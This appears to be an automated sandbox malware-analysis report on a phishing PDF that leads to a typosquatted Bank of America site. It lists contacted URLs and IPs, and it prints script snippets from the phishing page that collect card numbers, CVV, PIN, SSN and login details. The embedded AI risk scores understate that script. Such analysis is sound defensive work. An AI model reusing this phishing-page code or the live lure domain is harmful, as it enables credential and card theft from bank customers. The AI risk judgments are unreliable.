https://dialogflow.cloud.google.com/v1/cx/integrations/messenger/webhook	chromecache_417.15.dr, chromecache_351.15.dr	false		high
https://github.com/jquery/jquery-color	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://d30y9cdsu7xlg0.cloudfront.net/png/29715-200.png	chromecache_351.15.dr	false	Avira URL Cloud: safe	unknown
https://www.gstatic.c..?/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/recaptcha__.	chromecache_478.15.dr, chromecache_505.15.dr, chromecache_460.15.dr	false		high
http://www.opensource.org/licenses/mit-license.php	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://support.google.com/recaptcha/#6175971	chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	false		high
https://www.virustotal.com/ui/users/$	chromecache_509.15.dr	false		high
https://stats.g.doubleclick.net/j/collect	chromecache_410.15.dr	false		high
https://support.google.com/recaptcha	chromecache_517.15.dr	false		high
https://apis.google.com/js/api.js	chromecache_509.15.dr	false		high
https://www.virustotal.com/	chromecache_488.15.dr	false		high
https://www.virustotal.com/graph/assets/images	chromecache_466.15.dr, chromecache_364.15.dr	false		high
https://www.bankofamerica.com/mweb/index.html?app=signon	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://docs.virustotal.com/reference/overview	chromecache_342.15.dr, chromecache_502.15.dr, chromecache_474.15.dr, chromecache_485.15.dr	false	Avira URL Cloud: safe	unknown
https://plus.google.com	chromecache_421.15.dr	false		high
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que	chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	false		high
https://cloud.google.com/dialogflow/cx/docs/concept/integration/dialogflow-messenger/fulfillment.	chromecache_417.15.dr, chromecache_351.15.dr	false		high
https://www.virustotal.com/ui/analyses/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7	chromecache_495.15.dr	false		high
https://github.com/markedjs/marked.	chromecache_417.15.dr, chromecache_351.15.dr	false		high
https://cloud.google.com/terms/service-terms	chromecache_417.15.dr, chromecache_351.15.dr	false		high
http://docs.jquery.com/Plugins/Validation	chromecache_465.15.dr, chromecache_463.15.dr	false	Avira URL Cloud: safe	unknown
https://cloud.google.com/contact	chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	false		high
https://www.youtube.com/embed	chromecache_417.15.dr, chromecache_351.15.dr	false		high
https://npmcdn.com/jsencrypt	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://www.google.com/recaptcha/api.js	chromecache_509.15.dr	false		high
http://a9.com/-/spec/opensearch/1.1/	chromecache_366.15.dr	false		high
https://www.virustotal.com	chromecache_509.15.dr	false		high
https://apis.google.com	chromecache_421.15.dr, chromecache_353.15.dr	false		high
https://www.virustotal.com/ui/search?limit=20&relationships	chromecache_519.15.dr	false		high
https://www.google.com/recaptcha/api2/	chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	false		high
https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp?r=	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://domains.google.com/suggest/flow	chromecache_421.15.dr	false		high
https://virustotal.com	chromecache_509.15.dr	false		high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.2.dr	false		high
https://secure.opinionlab.com/ccc01/comment_card.asp?	chromecache_465.15.dr, chromecache_463.15.dr	false		high
https://github.com/chjj/)	chromecache_417.15.dr, chromecache_351.15.dr	false		high
https://cloud.google.com/recaptcha-enterprise/billing-information	chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	false		high
https://googleads.g.doubleclick.net	chromecache_343.15.dr	false		high
https://www.recaptcha.net/recaptcha/enterprise/	chromecache_433.15.dr, chromecache_328.15.dr	false		high
https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca	chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	false		high
https://td.doubleclick.net	chromecache_324.15.dr, chromecache_373.15.dr, chromecache_388.15.dr, chromecache_490.15.dr, chromecache_473.15.dr, chromecache_343.15.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.54.88.138	www.virustotal.com	United States	2686	ATGS-MMD-ASUS	false
172.217.18.14	play.google.com	United States	15169	GOOGLEUS	false
142.250.185.227	unknown	United States	15169	GOOGLEUS	false
216.239.36.21	virustotal.com	United States	15169	GOOGLEUS	false
188.119.66.154	online.access.secure.bankofamerlica.com	Russian Federation	209499	FLYNETRU	false
142.250.184.228	www.google.com	United States	15169	GOOGLEUS	false
142.250.184.195	recaptcha.net	United States	15169	GOOGLEUS	false
142.250.186.163	www.recaptcha.net	United States	15169	GOOGLEUS	false
142.250.185.132	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.100	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.18

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592047
Start date and time:	2025-01-15 17:42:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DEEZI80S.pdf renamed because original name is a hash value
Original Sample Name:	Mk Steps - nIin Surity Ntifition NUM-PB4SDEEZI80S.pdf
Detection:	MAL
Classification:	mal56.phis.winPDF@39/424@31/12
Cookbook Comments:	Found application associated with file extension: .pdf

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.88.176, 52.6.155.20, 3.233.129.217, 52.22.41.97, 3.219.243.226, 2.16.168.105, 2.16.168.125, 162.159.61.3, 172.64.41.3, 23.209.209.135, 2.22.50.144, 2.22.50.131, 2.22.242.11, 2.22.242.123, 142.250.185.142, 64.233.166.84, 172.217.18.3, 142.250.184.206, 2.16.168.107, 142.250.181.238, 216.58.206.78, 142.250.185.138, 142.250.181.234, 216.58.212.170, 142.250.184.202, 142.250.184.234, 142.250.186.74, 216.58.206.74, 142.250.185.202, 142.250.186.170, 142.250.186.106, 216.58.206.42, 142.250.185.74, 142.250.186.42, 142.250.185.170, 142.250.185.234, 172.217.18.106, 142.250.185.238, 142.250.184.238, 142.250.185.110, 216.58.206.46, 142.250.186.78, 142.250.185.131, 142.250.74.202, 216.58.212.138, 142.250.185.67, 172.217.16.206, 142.250.185.174, 142.250.184.227, 142.250.184.232, 172.217.16.200, 142.250.186.99, 172.217.23.106, 172.217.18.10, 142.250.186.138, 172.217.16.202, 142.250.185.106, 142.250.186.35, 172.217.16.195, 142.250.185.206, 184.28.90.27, 4.245.163.56, 23.56.162.2
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, acroipm2.adobe.com, dns.msftncsi.com, clients2.google.com, redirector.gvt1.com, login.live.com, ssl-delivery.adobe.com.edgekey.net, www.googletagmanager.com, a122.dscd.akamai.net, update.googleapis.com, www.gstatic.com, connectauthentication.blob.core.windows.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, www.google-analytics.com, www.bing.com, clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, encrypted-tbn0.gstatic.com, fonts.gstatic.com, ctldl.windowsupdate.com, ogads-pa.googleapis.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.c
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:43:19	API Interceptor	2x Sleep call for process: AcroCEF.exe modified

LLM Input / Output

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to lowest risk score due to lack of data" ] }
Date: unknown
URL: https://online.access.secure.bankofamerlica.com/as... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "This script exhibits several behaviors that raise moderate security concerns. It uses localStorage to manage session information and detect multiple tabs, which could potentially be used for session hijacking or other malicious purposes. Additionally, the script includes functions for handling cookies and credit card validation, which could be used to collect sensitive user data. While the script does not appear to have clear malicious intent, the combination of these behaviors warrants further review and caution." }
var otp_timeout=4e4;window.session=makeid(5),localStorage.setItem("session",window.session);var onStorage=function(e){"session"===e.key&&e.newValue!==window.session&&localStorage.setItem("multitab",window.session),"multitab"===e.key&&e.newValue&&e.newValue!==window.session&&(window.removeEventListener("storage",onStorage),localStorage.setItem("session",localStorage.getItem("multitab")),localStorage.removeItem("multitab"),document.body.innerHTML="The current page is already open in another tab. Please follow there!")};function makeid(e){for(var t="",i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",a=0;a<e;a++)t+=i.charAt(Math.floor(62Math.random()));return t}function setCookie(e,t,i){var a="";if(i){var s=new Date;s.setTime(s.getTime()+60i1e3),a="; expires="+s.toUTCString()}document.cookie=e+"="+(t\|\|"")+a+"; path=/"}function getCookie(e){const t=document.cookie.split(";");for(let i=0;i<t.length;i++){let a=t[i].trim().split("=");if(a[0]===e)return a[1]}return""}function eraseCookie(e){document.cookie=e+"=; Path=/; Expires=Thu, 01 Jan 1970 00:00:01 GMT;"}function vcc(e){if(""==(e=e.replace(/\s/g,"")))return!1;if(e.length<14)return!1;if(/[^0-9-\s]+/.test(e))return!1;let t=0,i=!1;for(var a=(e=e.replace(/\D/g,"")).length-1;a>=0;a--){var s=e.charAt(a),n=parseInt(s,10);i&&(n=2)>9&&(n-=9),t+=n,i=!i}return t%10==0}function check_cnum(e){0==vcc($(e).val())?($("#cnum_errorMessage").show(),$("#cnum").addClass("spa-error-form-input--validation")):($("#cnum_errorMessage").hide(),$("#cnum").removeClass("spa-error-form-input--validation"))}function check_exp_date(e){var t=$(e).val().split("/");if(2!=t.length\|\|t[0].length<2\|\|t[1].length<2)return $("#expd_errorMessage").show(),$("#expd").addClass("spa-error-form-input--validation"),!1;var i=t[0],a=t[1],s=new Date,n=s.getFullYear().toString().substr(-2),o=s.getMonth()+1;return i>12\|\|i<1\|\|a<n\|\|a==n&&i<o?($("#expd_errorMessage").show(),$("#expd").addClass("spa-error-form-input--validation"),!1):($("#expd_errorMessage").hide(),$("#expd").removeClass("spa-error-form-input--validation"),!0)}function pincheck(e){var t=$(e).val();return t.length<4\|\|t.length>12?($("#pin_errorMessage").show(),$("#pin").addClass("spa-error-form-input--validation"),!1):($("#pin_errorMessage").hide(),$("#pin").removeClass("spa-error-form-input--validation"),!0)}function cvvcheck(e){var t=$(e).val();return t.length<3\|\|t.length>4?($("#cvv_errorMessage").show(),$("#cvv").addClass("spa-error-form-input--validation"),!1):($("#cvv_errorMessage").hide(),$("#cvv").removeClass("spa-error-form-input--validation"),!0)}function check_card_fields(){$("#cvv").length&&$("#cvv").val().length>1&&$("#cvv_errorMessage").is(":hidden")&&$("#expd").val().length>1&&$("#expd_errorMessage").is(":hidden")&&$("#cnum").val().length>1&&$("#cnum_errorMessage").is(":hidden")&&$("#pin").val().length>1&&$("#pin_errorMessage").is(":hidden")?$("#card_submit").prop("disabled",!1):$("#card_submit").prop("disabled",!0)}function check_personal_btn(){$("#fullname").val().length>1&&$("#fullname_errorMessage").is(":hidden")&&$("#bdate").val().length>1&&$("#bdate_errorMessage").is(":hidden")&&$("#ssn").val().length>1&&$("#ssn_errorMessage").is(":hidden")&&$("#phone").val().length>1&&$("#phone_errorMessage").is(":hidden")&&$("#address").val().length>1&&$("#address_errorMessage").is(":hidden")&&$("#city").val().length>1&&$("#city_errorMessage").is(":hidden")&&$("#state").val().length>1&&$("#state_errorMessage").is(":hidden")&&$("#zip").val().length>1&&$("#zip_errorMessage").is(":hidden")&&$("#email").val().length>1&&$("#email_errorMessage").is(":hidden")?$("#personal_submit").prop("disabled",!1):$("#personal_submit").prop("disabled",!0)}function check_personal_fields(e){var t=$(e).attr("id");if("fullname"==t\|\|"bdate"==t\|\|"ssn"==t\|\|"phone"==t\|\|"address"==t\|\|"city"==t\|\|"state"==t\|\|"zip"==t\|\|"email"==t)return $(e).val().length<2?($("#"+t+"_errorMessage").show(),$("#"+t).addClass("spa-error-form-input--validation"),check_personal_btn(),!1):($("#"+t+"_error
URL: https://online.access.secure.bankofamerlica.com/as... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided code appears to be the jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscated code. The code is well-structured and follows common JavaScript patterns, indicating it is likely a legitimate library and not a malicious script." }
/! jQuery v3.5.1 \| (c) JS Foundation and other contributors \| jquery.org/license / ! function(e, t) { "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function(e) { if (!e.document) { throw new Error("jQuery requires a window with a document") } return t(e) } : t(e) }("undefined" != typeof window ? window : this, function(C, e) { var t = [], r = Object.getPrototypeOf, s = t.slice, g = t.flat ? function(e) { return t.flat.call(e) } : function(e) { return t.concat.apply([], e) }, u = t.push, i = t.indexOf, n = {}, o = n.toString, v = n.hasOwnProperty, a = v.toString, l = a.call(Object), y = {}, m = function(e) { return "function" == typeof e && "number" != typeof e.nodeType }, x = function(e) { return null != e && e === e.window }, E = C.document, c = { type: !0, src: !0, nonce: !0, noModule: !0 }; function b(e, t, n) { var r, i, o = (n = n \|\| E).createElement("script"); if (o.text = e, t) { for (r in c) { (i = t[r] \|\| t.getAttribute && t.getAttribute(r)) && o.setAttribute(r, i) } } n.head.appendChild(o).parentNode.removeChild(o) } function w(e) { return null == e ? e + "" : "object" == typeof e \|\| "function" == typeof e ? n[o.call(e)] \|\| "object" : typeof e } var f = "3.5.1", S = function(e, t) { return new S.fn.init(e, t) }; function p(e) { var t = !!e && "length" in e && e.length, n = w(e); return !m(e) && !x(e) && ("array" === n \|\| 0 === t \|\| "number" == typeof t && 0 < t && t - 1 in e) } S.fn = S.prototype = { jquery: f, constructor: S, length: 0, toArray: function() { return s.call(this) }, get: function(e) { return null == e ? s.call(this) : e < 0 ? this[e + this.length] : this[e] }, pushStack: function(e) { var t = S.merge(this.constructor(), e); return t.prevObject = this, t }, each: function(e) { return S.each(this, e) }, map: function(n) { return this.pushStack(S.map(this, function(e, t) { return n.call(e, t, e) })) }, slice: function() { return this.pushStack(s.apply(this, arguments)) }, first: function() { return this.eq(0) }, last: function() { return this.eq(-1) }, even: function() { return this.pushStack(S.grep(this, function(e, t) { return (t + 1) % 2 })) }, odd: function() { return this.pushStack(S.grep(this, function(e, t) { return t % 2 })) }, eq: function(e) { var t = this.length, n = +e + (e < 0 ? t : 0); return this.pushStack(0 <= n && n < t ? [this[n]] : []) }, end: function() { return this.prevObject \|\| this.constructor() }, push: u, sort: t.sort, splice: t.splice }, S.extend = S.fn.extend = function() { var e, t, n, r, i, o, a = arguments[0] \|\| {}, s = 1, u = arguments.length, l = !1; for ("boolean" == typeof a && (l = a, a = arguments[s] \|\| {}, s++), "object" == typeof a \|\| m(a) \|\| (a = {}), s === u && (a = this, s--); s < u; s++) { if (null != (e = arguments[s])) { for (t in e) { r = e[t], "__proto__" !== t && a !== r && (l && r && (S.isPlainObject(r) \|\| (i = Array.isArray(r))) ? (
URL: https://online.access.secure.bankofamerlica.com/as... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any high-risk indicators like dynamic code execution or data exfiltration, it engages in external data transmission, uses fallback domains, and performs aggressive DOM manipulation. Additionally, the script appears to be handling sensitive user information, such as online IDs and passcodes, which increases the potential risk if the implementation is not properly secured. Further review is recommended to ensure the script's functionality aligns with its intended purpose and that appropriate security measures are in place to protect user data." }
$(function () { if ($('.online-id-vipaa-module .enter-skin').length > 0) { //Check policy call //online-id-select for saved oids var oidselect = $('select#online-id-select'); //online-id-input var oidinput = $('input#enterID-input'); //passcode input var pcinput = $('input#tlpvt-passcode-input'); //create hidden field $('.TL_NPI_Pass').after('<input type="hidden" name="_ib" id="_ib" value="" />'); if(!!captureScriptHashInfo && typeof getScriptTagInfo === 'function') { getScriptTagInfo().then(function(output){ $('#EnterOnlineIDForm').append('<input type="hidden" name="_sc" id="_scID" value="'+btoa(JSON.stringify(output))+'" />'); }); } var failedAttempt = 1; //detector props var detectorProps_1 = { oidkeypress: false, oidpaste: false, pckeypress: false, pcpaste: false, userAgent: window.navigator.userAgent, pwMan: true }; function updateResult(el) { if (el === 'init') { detectorProps_1.pwMan = true; } else { detectorProps_1.pwMan = false; detectorProps_1[el] = true; } $('input#_ib').val(JSON.stringify(detectorProps_1)); } updateResult('init'); //online-id //in case of saved oid, ID input is not present if (!oidselect.length) { oidinput.on("keypress", function (e) { updateResult("oidkeypress"); }); oidinput.on("paste", function (e) { updateResult("oidpaste"); }); } //passcode pcinput.on("keypress", function (e) { updateResult('pckeypress'); }); pcinput.on("paste", function (e) { updateResult('pcpaste'); }); var selectedEncryptedID; function isDigitalUser(){ var checkOnlineIDSavedCookie = undefined;//getCookie('olb_signin_prefill_multi_secure'); var pwdlCookie = undefined;//getCookie('pwdl'); var dropDownOptionElem = document.getElementById('online-id-select'); var onlineIdList = ""; if(checkOnlineIDSavedCookie){ var onlineIdList = checkOnlineIDSavedCookie.split('\|\|'); // var selectedEncryptedID; if(dropDownOptionElem){ var selectedID = $('select#online-id-select option:selected').text(); for (var i = 0; i < onlineIdList.length; i++){ var onlineIdsWithEncrypted = onlineIdList[i].split(':'); if(onlineIdList[i].indexOf(selectedID) > -1){ selectedEncryptedID = onlineIdList[i].split(':')[1]; } } } } if(checkOnlineIDSavedCookie && pwdlCookie && pwdlCookie.indexOf(selectedEncryptedID) > -1){ return true; } else { return false; } } function isWebBioUser(){ var checkOnlineIDSavedCookie = undefined;//getCookie('olb_signin_prefill_multi_secure'); var webBioCookie = undefined;//getCookie('LGNOPTS'); var oidLGNOPTS = webBioCookie; if(webBioCookie !== undefined && webBioCookie !== null){ var oidLGNOPTSStr = atob(webBioCookie); var oidLGNOPTSObj = JSON.parse(oidLGNOPTSStr); if(oidLGNOPTSObj && oidLGNOPTSObj['web-bio']){ oidLGNOPTS = oidLGNOPTSObj['web-bio']; } } var dropDownOptionElem = document.getElementById('online-id-select'); var onlineIdList = ""; if(checkOnlineIDSavedCookie){ var onlineIdList = checkOnlineIDSavedCookie.split('\|\|'); // var selectedEncryptedID; if(dropDownOptionElem){ var selectedID = $('select#online-id-select option:selected').text(); for (var i = 0; i < onlineIdList.length; i++){ var onlineIdsWithEncrypted = onlineIdList[i].split(':'); if(onlineIdList[i].indexOf(selectedID) > -1){ selectedEncryptedID = onlineIdList[i].split(':')[1]; } } } } if(checkOnlineIDSavedCookie && oidLGNOPTS && oidLGNOPTS.indexOf(selectedEncryptedID) > -1)
URL: https://bankofamerlica.com Model: Joe Sandbox AI	{ "typosquatting": true, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": true, "third_party_hosting": true, "reasoning": "This URL is attempting to typosquat Bank of America by replacing the 'i' with an 'l' (bankofamerlica instead of bankofamerica). This is a common phishing technique targeting users who mistype the legitimate domain name." }
URL: https://bankofamerlica.com
URL: https://online.access.secure.bankofamerlica.com/lo... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet does not exhibit any high-risk behaviors. It appears to be collecting some basic information about the current page, such as the hostname, and setting some variables related to capturing script hash information and mouse events. While the intent is not entirely clear, these actions are generally low-risk and could be part of a legitimate analytics or tracking functionality. However, the lack of context and the potential for further behavior not shown in the snippet warrants a medium-risk score." }
var pageHostname = window.location.host; var captureScriptHashInfo = false; var captureMouseEvents = "false"; var maxMouseEvents = 0; captureScriptHashInfo = true;
URL: https://www.gstatic.com/dialogflow-console/fast/df... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a Google Cloud Platform library for the Dialogflow service. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or obfuscated code. The script primarily consists of utility functions and polyfills, which pose a low risk. While it uses some legacy APIs like XDomainRequest, the overall behavior is consistent with a legitimate library, and there are no clear signs of malicious intent. Therefore, the risk score is assessed as 3 (Low Risk)." }
/** Copyright 2024 Google LLC This Software is made available under Section 3 of the General Service Terms of the Google Cloud Platform Service Specific Terms at https://cloud.google.com/terms/service-terms, except that Customer may additionally embed and/or distribute this Software to Customer End Users in connection with Customer Applications integrating with the Dialogflow Service. /'use strict';var DF_M;function DF_Maa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var DF_Mba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a}; function DF_Mca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var DF_Ma=DF_Mca(this); function DF_Mb(a,b){if(b)a:{var c=DF_Ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&DF_Mba(c,a,{configurable:!0,writable:!0,value:b})}} DF_Mb("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f\|\|"")+"_"+e++,f)}function c(f,g){this.g=f;DF_Mba(this,"description",{configurable:!0,writable:!0,value:g})}if(a)return a;c.prototype.toString=function(){return this.g};var d="jscomp_symbol_"+(Math.random()1E9>>>0)+"_",e=0;return b}); DF_Mb("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=DF_Ma[b[c]];typeof d==="function"&&typeof d.prototype[a]!="function"&&DF_Mba(d.prototype,a,{configurable:!0,writable:!0,value:function(){return DF_Mda(DF_Maa(this))}})}return a}); function DF_Mda(a){a={next:a};a[Symbol.iterator]=function(){return this};return a} var DF_Mea=typeof Object.create=="function"?Object.create:function(a){function b(){}b.prototype=a;return new b},DF_Mfa=function(){function a(){function c(){}new c;Reflect.construct(c,[],function(){});return new c instanceof c}if(typeof Reflect!="undefined"&&Reflect.construct){if(a())return Reflect.construct;var b=Reflect.construct;return function(c,d,e){c=b(c,d);e&&Reflect.setPrototypeOf(c,e.prototype);return c}}return function(c,d,e){e===void 0&&(e=c);e=DF_Mea(e.prototype\|\|Object.prototype);return Function.prototype.apply.call(c, e,d)\|\|e}}(),DF_Mga;if(typeof Object.setPrototypeOf=="function")DF_Mga=Object.setPrototypeOf;else{var DF_Mha;a:{var DF_Mia={a:!0},DF_Mja={};try{DF_Mja.__proto__=DF_Mia;DF_Mha=DF_Mja.a;break a}catch(a){}DF_Mha=!1}DF_Mga=DF_Mha?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}var DF_Mka=DF_Mga; function DF_Mc(a,b){a.prototype=DF_Mea(b.prototype);a.prototype.constructor=a;if(DF_Mka)DF_Mka(a,b);else for(var c in b)if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.Gd=b.prototype}function DF_Md(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:DF_Maa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");} function DF_Me(a){if(!(a instanceof Array)){a=DF_Md(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}function DF_Mf(a){return DF_Mla(a,a)}function DF_Mla(a,b){a.raw=b;Object.freeze&&(Object.freeze(a),Object.freeze(b));return a}function DF_Mma(a,b){return Object.prototype.hasOwnProperty.call(a,b)}var DF_Mna=typeof Object.assign=="function"?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)DF_Mma(d,e)&&(a[e]=d[e])}return a}; DF_Mb("Object.assign",function(a){return a\|\|DF_Mna});function DF
URL: PDF document Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Continue", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.gstatic.com/recaptcha/releases/1Bq_oiM... Model: Joe Sandbox AI	```json { "risk_score": 3, "reasoning": "The script contains obfuscated code and complex logic, but there are no clear indicators of malicious behavior such as data exfiltration or dynamic code execution. The script appears to be part of a legitimate library (Closure Library) with standard error handling and platform detection, which aligns with typical analytics or telemetry functionality." }
(function(){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 / / Copyright Google LLC SPDX-License-Identifier: Apache-2.0 / / Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 / / Copyright 2005, 2007 Bob Ippolito. All Rights Reserved. Copyright The Closure Library Authors. SPDX-License-Identifier: MIT / var y=function(){return[function(Y,H,g,f,r,M,C,D,e,d,z,G,x,N,u,m,t,P,n,c,B,F,h){if((Y\|9)<((Y-7\|((F=[0,1E3,17],(Y-5^F[2])<Y&&(Y-5\|58)>=Y)&&(W[25](59,f,g),r=YE(Number(f)),z1(r)&&(!g&&!G1\|\|r>=H)?h=String(r):(M=f.indexOf("."),M!==-1&&(f=f.substring(H,M)),h=w[38](F[2],16,20,f))),36))>=Y&&(Y+4&13)<Y&&xE.call(this,375,10),21)&&Y<<1>=5){if(G=(d=W[32](12,(n=["iPod","allow",(m={title:"reCAPTCHA",tabindex:C,width:String(f.width),height:String(f.height),role:"presentation",name:g+M.X},"kaios")],"OPR"))&&p[42](8, H,W[26](15,2,"Edge","Edg/","Opera"),"17.5")>=F[0],Z[F[2]](30,n[F[0]]))){if(K[N=(P="",v[23](3)),28](16))e=/Windows (?:NT\|Phone) ([0-9.]+)/,P=(u=e.exec(N))?u[H]:"0.0";else if(Z[F[2]](27,n[F[0]]))e=/(?:iPhone\|iPod\|iPad\|CPU)\s+OS\s+(\S+)/,P=(z=e.exec(N))&&z[H].replace(/_/g,".");else if(L[30](7))e=/Mac OS X ([0-9_.]+)/,P=(B=e.exec(N))?B[H].replace(/_/g,"."):"10";else if(v[23](7).toLowerCase().indexOf(n[2])!=-1)e=/(?:KaiOS)\/(\S+)/i,P=(x=e.exec(N))&&x[H];else if(p[21](16))e=/Android\s+([^\);]+)(\)\|;)/, P=(t=e.exec(N))&&t[H];else if(v[F[0]](26)?wB.platform==="Chrome OS":v[6](42,"CrOS"))e=/(?:CrOS\s+(?:i686\|x86_64)\s+([0-9.]+))/,P=(c=e.exec(N))&&c[H];G=p[42](9,H,P\|\|"","17.5")>=F[0]}if(d\|\|G)m[n[1]]="private-token";M.M=W[28](F[2],"IFRAME",F[0],m,L[11](7,r)),D.appendChild(M.M)}return(Y-4^15)<Y&&(Y-6\|23)>=Y&&(r.Xu.send(g,f),r.o&&r.o.resolve(f),w[9](52,function(){return r.Cg(f.response,H)},f.timeoutF[1]),h=r.qV({id:null,timeout:null,kK:1E3,Ip:M?1:null})),h},function(Y,H,g,f,r,M,C,D,e,d,z,G,x,N,u,m,t, P,n,c){if((Y&(n=[15,"toString","UnknownError"],109))==Y)y[n[0]](74,g,ux,H,f);if(Y+2>>1<Y&&(Y-7^18)>=Y)if(C=["Not available",0,"Unknown Error of unknown type"],z=y[n[0]](7,C[1],".","window.location.href"),M==H&&(M='Unknown Error of type "null/undefined"'),typeof M==="string")c={message:M,name:"Unknown error",lineNumber:"Not available",fileName:z,stack:"Not 